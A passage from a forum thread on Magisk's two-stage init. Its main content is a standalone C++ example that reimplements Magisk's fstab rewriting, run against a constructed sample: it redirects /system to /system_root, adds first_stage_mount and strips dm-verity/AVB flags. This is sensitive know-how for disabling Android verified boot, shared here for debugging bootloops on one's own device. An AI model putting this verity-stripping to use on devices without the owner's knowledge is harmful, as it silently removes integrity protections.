        restore_folder(ROOTOVL, overlays);

        // Ack and bail out!
        write_int(client, 0);
        close(client);
        close(sockfd);
        exit(0);
    }
}
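The fstab rewriting that twostage.cpp performs in the first-stage ramdisk (the part that decides whether a 2SI device boots or loops) can be exercised off-device, which is far quicker than reflashing AP to find out. The following is an added example written for this thread, not Magisk's own code and not the poster's attachment. It reimplements the three edits the posted prepare() applies to each fstab entry: tagging first_stage_mount (Magisk only does this for a dt fstab, so it is a parameter here), redirecting /system to /system_root so init does not switch_root in first stage, and dropping the dm-verity/AVB fsmgr flags. The page does not show patch_verity(), so the flag list in strip_verity_flags() is an assumption, and the sample fstab at the bottom is constructed, not taken from any device. Run it against a copy of your device's real fstab.* to see what magiskinit would hand to init.

```cpp
#include <cctype>
#include <cstdio>
#include <string>
#include <vector>

// Stand-in for Magisk's fstab_entry: the five whitespace-separated fstab columns.
struct FstabEntry {
    std::string dev, mnt_point, type, mnt_flags, fsmgr_flags;
};

// Parse one fstab line with the same sscanf("%n%*s%n ...") technique as twostage.cpp:
// each %*s skips a token without storing it, and the %n directives around it record the
// byte offsets where the token starts and ends. sscanf's return value is useless here
// (no stored conversions), so the offsets are pre-set to -1 and the last one is checked
// to reject lines with fewer than five columns. Comments and blank lines are skipped.
static bool parse_fstab_line(const std::string &l, FstabEntry &entry) {
    if (l.empty() || l[0] == '#')
        return false;
    int off[10];
    for (int &o : off) o = -1;
    sscanf(l.c_str(), "%n%*s%n %n%*s%n %n%*s%n %n%*s%n %n%*s%n",
           &off[0], &off[1], &off[2], &off[3], &off[4],
           &off[5], &off[6], &off[7], &off[8], &off[9]);
    if (off[9] < 0)
        return false;  // short line: fewer than five columns
    auto field = [&](int i) {
        size_t start = off[2 * i];
        // %*s skips leading whitespace, so the first offset may sit before the token.
        while (start < (size_t) off[2 * i + 1] && isspace((unsigned char) l[start]))
            ++start;
        return l.substr(start, off[2 * i + 1] - start);
    };
    entry.dev = field(0);
    entry.mnt_point = field(1);
    entry.type = field(2);
    entry.mnt_flags = field(3);
    entry.fsmgr_flags = field(4);
    return true;
}

// Simplified stand-in for Magisk's patch_verity(): drop the fsmgr flags that enable
// dm-verity/AVB on the partition. The exact list Magisk strips is not on this page,
// so this set is an assumption made for the example.
static std::string strip_verity_flags(const std::string &flags) {
    std::string out;
    size_t pos = 0;
    while (pos <= flags.size()) {
        size_t comma = flags.find(',', pos);
        if (comma == std::string::npos) comma = flags.size();
        std::string f = flags.substr(pos, comma - pos);
        bool verity = f == "verify" || f == "avb" || f == "support_scfs" ||
                      f.compare(0, 4, "avb=") == 0 || f.compare(0, 9, "avb_keys=") == 0;
        if (!f.empty() && !verity) {
            if (!out.empty()) out += ',';
            out += f;
        }
        pos = comma + 1;
    }
    return out;
}

// Apply the rewrites twostage.cpp performs before writing the fstab back for init:
//  - optionally tag every entry first_stage_mount (what Magisk does for a dt fstab),
//  - redirect /system to /system_root so init does not switch_root during first stage,
//  - remove the verity/AVB flags that make 2SI bootloop on some devices.
static std::vector<FstabEntry> patch_fstab(const std::string &text, bool force_first_stage) {
    std::vector<FstabEntry> out;
    size_t pos = 0;
    while (pos < text.size()) {
        size_t nl = text.find('\n', pos);
        if (nl == std::string::npos) nl = text.size();
        std::string line = text.substr(pos, nl - pos);
        pos = nl + 1;
        FstabEntry e;
        if (!parse_fstab_line(line, e))
            continue;
        if (force_first_stage && e.fsmgr_flags.find("first_stage_mount") == std::string::npos) {
            if (!e.fsmgr_flags.empty()) e.fsmgr_flags += ',';
            e.fsmgr_flags += "first_stage_mount";
        }
        if (e.mnt_point == "/system")
            e.mnt_point = "/system_root";
        e.fsmgr_flags = strip_verity_flags(e.fsmgr_flags);
        out.push_back(e);
    }
    return out;
}

// Serialise entries in the same "dev mnt type mnt_flags fsmgr_flags" layout as fstab_entry::to_file.
static std::string to_text(const std::vector<FstabEntry> &entries) {
    std::string s;
    for (const auto &e : entries)
        s += e.dev + " " + e.mnt_point + " " + e.type + " " + e.mnt_flags + " " + e.fsmgr_flags + "\n";
    return s;
}

// Constructed sample fstab for the demonstration (not copied from any real device).
static const char *SAMPLE_FSTAB =
    "# constructed example, not a real device fstab\n"
    "/dev/block/by-name/system /system ext4 ro,barrier=1 wait,slotselect,avb=vbmeta_system\n"
    "/dev/block/by-name/vendor /vendor ext4 ro,barrier=1 wait,slotselect,avb,first_stage_mount\n"
    "/dev/block/by-name/userdata /data f2fs noatime,nosuid,nodev latemount,wait,check,fileencryption=aes-256-xts\n"
    "\n"
    "broken line\n";

int main() {
    fputs(to_text(patch_fstab(SAMPLE_FSTAB, true)).c_str(), stdout);
    return 0;
}
```

Comparing the output for your real fstab with and without force_first_stage shows the two different results the posted code can produce, depending on whether read_dt_fstab() found entries in the device tree or the file fstab was parsed instead; the partitions that still carry an avb or verify flag after the rewrite are the ones to look at first when chasing a 2SI bootloop.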